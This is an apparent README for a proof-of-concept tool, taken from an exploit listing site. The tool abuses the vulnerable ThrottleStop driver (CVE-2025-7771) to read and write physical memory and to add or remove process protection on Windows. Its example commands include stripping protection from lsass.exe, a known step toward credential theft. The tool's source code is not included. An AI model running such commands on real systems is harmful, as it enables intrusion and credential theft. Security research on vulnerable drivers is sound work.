Share
## https://sploitus.com/exploit?id=FFCA31E5-1044-523B-8B62-63B7F27F3D8F
# throttlestop-poc
This is a simple Proof-of-Concept that abuses the vulnerble driver ThrottleStop (CVE-2025-7771) to perform physical memory read/write and either apply or remove process protection from any running process.

## Usage
```cmd
throttlestop-poc.exe  [protect | expose] 
```
### Windows Build Options
- 21H2
- 22H2
- 23H2
- 24H2
- 25H2 (default)

## Example
```cmd
throttlestop-poc.exe 25H2 expose lsass.exe

throttlestop-poc.exe 23H2 protect calc.exe
```